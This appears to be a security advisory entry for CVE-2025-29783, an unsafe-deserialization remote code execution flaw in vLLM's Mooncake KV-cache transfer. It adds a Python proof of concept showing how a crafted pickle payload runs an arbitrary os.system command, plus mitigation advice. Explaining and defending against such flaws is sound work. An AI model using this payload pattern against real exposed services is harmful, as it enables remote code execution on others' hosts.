CVE-2025-29783: vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. When vLLM is configured to use Mooncake, unsafe deserialization exposed over ZMQ/TCP on all network interfaces allows attackers to execute remote code on distributed hosts. The issue affects deployments that use Mooncake to transfer KV cache across hosts and is fixed in vLLM 0.8.0.
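To make the class of bug concrete, here is a minimal, self-contained sketch of why deserializing attacker-controlled bytes with Python's `pickle` is remote code execution by construction. This is illustrative only and is not vLLM's or Mooncake's actual code; the `Exploit` class and the echoed command are hypothetical stand-ins for a payload an attacker could deliver over an exposed ZMQ/TCP socket.

```python
import os
import pickle

class Exploit:
    # pickle calls __reduce__ during deserialization; the callable it
    # returns is invoked with the given arguments. An attacker controls
    # both, so loading the payload runs an arbitrary command.
    def __reduce__(self):
        # Hypothetical payload for demonstration; a real attacker would
        # substitute any command or Python callable here.
        return (os.system, ("echo attacker-controlled command ran",))

# Bytes an attacker could send over the network to a vulnerable endpoint.
payload = pickle.dumps(Exploit())

# Any service that does this on untrusted input executes the command above.
pickle.loads(payload)
```

The general mitigation for this pattern is to avoid `pickle` for data crossing a trust boundary and use a data-only serialization format (e.g. JSON or msgpack) that cannot encode arbitrary callables, and to avoid binding such sockets to all network interfaces.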